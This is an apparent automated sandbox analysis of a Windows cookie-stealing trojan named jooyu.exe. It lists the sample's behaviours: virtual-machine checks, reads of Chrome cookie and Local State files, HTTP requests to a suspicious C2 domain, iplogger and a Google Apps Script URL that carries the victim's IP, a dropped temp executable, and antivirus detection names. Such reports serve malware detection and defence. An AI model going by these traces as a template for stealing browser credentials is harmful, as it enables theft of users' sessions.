jooyu.exe

This executable has a PDB path (1 event)

pdb_path

D:\workspace\workspace_c\GjOGoOIgHJEwh52iJ_20\Release\GjOGoOIgHJEwh52iJ_20.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 8, 2021, 10:43 a.m.		1	1	0

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

HHGE

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

POST method with no referer header

suspicious_request

POST http://uyg5wye.2ihsfa.com/api/?sid=207933&key=e00ce96d56b1d7110bbce62b19af1adf

Performs some HTTP requests (6 events)

request	GET http://ip-api.com/json/
request	GET http://uyg5wye.2ihsfa.com/api/fbtime
request	POST http://uyg5wye.2ihsfa.com/api/?sid=207933&key=e00ce96d56b1d7110bbce62b19af1adf
request	GET https://www.facebook.com/
request	GET https://script.google.com/macros/s/AKfycbyeDUociDSMjODhy_ZapM5zzyoJ3zrch9n5IUJeKIM3UQOEtZs/exec?loc=KR&app=Staoism&payoutcents=0.08&ver=3.5&ip=175.208.134.150
request	GET https://iplogger.org/18hh57

Sends data using the HTTP POST Method (1 event)

request

POST http://uyg5wye.2ihsfa.com/api/?sid=207933&key=e00ce96d56b1d7110bbce62b19af1adf

Steals private information from local Internet browsers (3 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies-journal

Foreign language identified in PE resource (3 events)

name

HHGE

language

LANG_CHINESE

filetype

PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x000bc710

size

0x00033e00

name

HHGE

language

LANG_CHINESE

filetype

PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x000bc710

size

0x00033e00

name

HHGE

language

LANG_CHINESE

filetype

PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x000bc710

size

0x00033e00

Looks up the external IP address (1 event)

domain

ip-api.com

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\jfiag3g_gg.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\jfiag3g_gg.exe

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses June 8, 2021, 10:43 a.m.	flags: 15 family: 0		111	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section	{u'size_of_data': u'0x00071800', u'virtual_address': u'0x0007f000', u'entropy': 7.891368917905341, u'name': u'.rsrc', u'virtual_size': u'0x00071690'}				entropy	7.89136891791				description	A section with a high entropy has been found
entropy	0.46780010304				description	Overall entropy of this PE file is high

Communicates with host for which no DNS query was performed (1 event)

host	172.217.25.14

Deletes executed files from disk (2 events)

file	C:\Users\test22\AppData\Local\Temp\fj4ghga23_fsa.txt
file	C:\Users\test22\AppData\Local\Temp\jfiag3g_gg.exe

Generates some ICMP traffic

File has been identified by 57 AntiVirus engines on VirusTotal as malicious (50 out of 57 events)

Bkav	W32.AIDetect.malware2
Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.GenericKD.37021101
FireEye	Generic.mg.aed57d50123897b0
CAT-QuickHeal	PUA.IgenericRI.S15903427
McAfee	GenericRXAA-AA!AED57D501238
Cylance	Unsafe
Zillya	Trojan.CookiesStealer.Win32.67
Sangfor	Trojan.Win32.Save.a
K7AntiVirus	Trojan ( 005723511 )
Alibaba	Trojan:Win32/CookiesStealer.12a8497f
K7GW	Trojan ( 005723511 )
CrowdStrike	win/malicious_confidence_80% (W)
Cyren	W32/CookieStealer.E.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win32/Agent.ACLN
APEX	Malicious
Paloalto	generic.ml
ClamAV	Win.Malware.Spyagent-9830839-0
Kaspersky	Trojan.Win32.CookiesStealer.b
BitDefender	Trojan.GenericKD.37021101
NANO-Antivirus	Riskware.Win32.PSWTool.hqsnsl
AegisLab	Trojan.Win32.CookiesStealer.4!c
Tencent	Malware.Win32.Gencirc.11bf8369
Ad-Aware	Trojan.GenericKD.37021101
Emsisoft	Trojan.Agent (A)
Comodo	Malware@#dtfpxx1rbcg5
F-Secure	Trojan.TR/AD.JazoStealer.znvpf
DrWeb	Trojan.PWS.Stealer.30443
VIPRE	Trojan.Win32.Generic!BT
TrendMicro	TROJ_GEN.R002C0PE721
McAfee-GW-Edition	BehavesLike.Win32.PUP.dc
Sophos	Mal/Generic-S
eGambit	Unsafe.AI_Score_98%
Avira	TR/AD.JazoStealer.znvpf
MAX	malware (ai score=100)
Antiy-AVL	Trojan/Generic.ASMalwS.2FFCE3E
Kingsoft	Win32.Heur.KVM003.a.(kcloud)
Gridinsoft	Trojan.Win32.Agent.vb
Microsoft	Trojan:Win32/CookiesStealer.OE!MTB
ZoneAlarm	not-a-virus:HEUR:PSWTool.Win32.PassView.a
GData	Trojan.GenericKD.37021101
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win32.RL_Infostealer.R356907
BitDefenderTheta	Gen:NN.ZexaF.34722.8uW@a82JMxcj
ALYac	Trojan.GenericKD.37021101
VBA32	BScope.Trojan.Infospy
Malwarebytes	Generic.Trojan.Malicious.DDS
TrendMicro-HouseCall	TROJ_GEN.R002C0PE721
Rising	Stealer.Facebook!1.CC5B (CLASSIC)